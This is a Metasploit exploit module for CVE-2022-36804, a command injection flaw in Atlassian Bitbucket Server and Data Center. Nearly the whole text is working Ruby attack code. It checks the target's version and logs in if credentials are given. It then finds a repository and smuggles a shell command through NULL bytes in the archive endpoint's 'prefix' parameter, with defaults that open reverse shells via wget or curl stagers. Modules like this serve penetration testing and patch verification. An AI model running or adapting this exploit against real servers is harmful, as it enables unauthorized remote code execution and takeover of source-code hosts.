Bitbucket Git Command Injection

Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The /rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive endpoint creates an archive of the repository, leveraging the git-archive command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.


SHA-256 | b243d8611790a90b192551fc326eb12be22c5ca700eb91be1d60e366f9f665cb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Bitbucket Git Command Injection',
'Description' => %q{
Various versions of Bitbucket Server and Data Center are vulnerable to
an unauthenticated command injection vulnerability in multiple API endpoints.

The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
creates an archive of the repository, leveraging the `git-archive` command to do so.
Supplying NULL bytes to the request enables the passing of additional arguments to the
command, ultimately enabling execution of arbitrary commands.
},
'License' => MSF_LICENSE,
'Author' => [
'TheGrandPew', # discovery
'Ron Bowes', # analysis and PoC
'Jang', # testanull - PoC
'Shelby Pace' # Metasploit module
],
'References' => [
[ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],
[ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],
[ 'CVE', '2022-36804' ]
],
'Platform' => [ 'linux' ],
'Privileged' => false,
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' => [
[
'Linux Dropper',
{
'Platform' => 'linux',
'Type' => :linux_dropper,
'Arch' => [ ARCH_X86, ARCH_X64 ],
'CmdStagerFlavor' => %w[wget curl bourne],
'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'Unix Command',
{
'Platform' => 'unix',
'Type' => :unix_cmd,
'Arch' => ARCH_CMD,
'Payload' => { 'BadChars' => %(:/?#[]@) },
'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
}
]
],
'DisclosureDate' => '2022-08-24',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ IOC_IN_LOGS ],
'SideEffects' => [ REPEATABLE_SESSION ]
}
)
)

register_options(
[
Opt::RPORT(7990),
OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),
OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),
OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])
]
)
end

def check
res = send_request_cgi(
'method' => 'GET',
'keep_cookies' => true,
'uri' => normalize_uri(target_uri.path, 'login')
)

return CheckCode::Unknown('Failed to receive response from application') unless res

unless res.body.include?('Bitbucket')
return CheckCode::Safe('Target does not appear to be Bitbucket')
end

footer = res.get_html_document&.at('footer')
return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer

version_str = footer.at('span')&.children&.text
return CheckCode::Detected('Cannot find version string in footer') unless version_str

matches = version_str.match(/v(\d+\.\d+\.\d+)/)
return CheckCode::Detected('Version unknown') unless matches && matches.length > 1

version_str = matches[1]
vprint_status("Found Bitbucket version: #{matches[1]}")

num_vers = Rex::Version.new(version_str)
return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')

major, minor, revision = version_str.split('.')
case major
when '6'
return CheckCode::Appears
when '7'
case minor
when '6'
return CheckCode::Appears if revision.to_i < 17
when '17'
return CheckCode::Appears if revision.to_i < 10
when '21'
return CheckCode::Appears if revision.to_i < 4
end
when '8'
case minor
when '0', '1'
return CheckCode::Appears if revision.to_i < 3
when '2'
return CheckCode::Appears if revision.to_i < 2
when '3'
return CheckCode::Appears if revision.to_i < 1
end
end

CheckCode::Detected
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def authenticate
print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login'),
'keep_cookies' => true
)

fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),
'keep_cookies' => true,
'vars_post' =>
{
'j_username' => username,
'j_password' => password,
'submit' => 'Log in'
}
)

fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'dashboard'),
'keep_cookies' => true
)

fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res

unless res.body.include?('Your work') && res.body.include?('Projects')
fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')
end

@authenticated = true
print_good('Successfully logged into Bitbucket!')
end

def find_public_repo
print_status('Searching Bitbucket for publicly accessible repository')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),
'keep_cookies' => true
)

fail_with(Failure::Disconnected, 'Did not receive a response') unless res
json_data = JSON.parse(res.body)
fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data

unless json_data['size'] > 0
fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')
end

# opt for public repos unless none exist.
# Attempt to use a private repo if so
repos = json_data['values']
possible_repos = repos.select { |repo| repo['public'] == true }
if possible_repos.empty? && @authenticated
possible_repos = repos.select { |repo| repo['public'] == false }
end

fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?
possible_repos.each do |repo|
project = repo['project']
next unless project

@project = project['key']
@repo = repo['slug']
break if @project && @repo
end

fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo
print_good("Found public repo '#{@repo}' in project '#{@project}'!")
end

def execute_command(cmd, _opts = {})
uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')
send_request_cgi(
'method' => 'GET',
'uri' => uri,
'keep_cookies' => true,
'vars_get' =>
{
'format' => 'zip',
'path' => Rex::Text.rand_text_alpha(2..5),
'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"
}
)
end

def exploit
@authenticated = false
authenticate unless username.blank? && password.blank?
find_public_repo

if target['Type'] == :linux_dropper
execute_cmdstager(linemax: 6000)
else
execute_command(payload.encoded)
end
end
end

Related Posts